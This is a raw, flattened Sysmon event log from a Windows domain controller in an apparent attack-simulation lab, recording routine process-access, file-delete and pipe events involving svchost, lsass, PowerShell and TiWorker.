12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-1000-00000000AD01}11442132C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E102-00000000AD01}2744C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.248{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.248{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:03.248{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.201{266CAFBE-6442-6064-E902-00000000AD01}4516ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:03.045{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.045{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:03.014{266CAFBE-6442-6064-E902-00000000AD01}4516\PSHost.132616656029554505.4516.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.998{266CAFBE-6442-6064-E902-00000000AD01}4516ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5flf4ai4.1n3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.998{266CAFBE-6442-6064-E902-00000000AD01}4516ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ka0f1qlp.tun.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.998{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ka0f1qlp.tun.ps12021-03-31 12:00:02.998 23542300x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.983{266CAFBE-642D-6064-9002-00000000AD01}4580NT 
AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.1.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.983{266CAFBE-6444-6064-ED02-00000000AD01}1660ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.967{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.0.regtrans-msMD5=8A477B539A426B3043BC8B1AC8B77849,SHA256=9F734458D445A7D7C50A3606CD09CA7717C53EDAA32423FCA643778E8CF109F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.905{266CAFBE-642D-6064-9002-00000000AD01}4580NT 
AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.blfMD5=4681B988DE2D937FC552F9724E2118CA,SHA256=573D77DA1E6836AFF3F403D89822C39903654C9F0D58973238321C4E1E1629A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.889{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.2.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.873{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.1.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.858{266CAFBE-642D-6064-9002-00000000AD01}4580NT 
AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.0.regtrans-msMD5=8A7F31E4FA3C8E2617498494A091D4CB,SHA256=95ED45DDDFF38BFFDB857D7CB682DC9CD866602DB4FE8BEFE28972D5A594DFC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.842{266CAFBE-642D-6064-8F02-00000000AD01}38684392C:\Windows\servicing\TrustedInstaller.exe{266CAFBE-642D-6064-9002-00000000AD01}4580C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.811{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.811{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
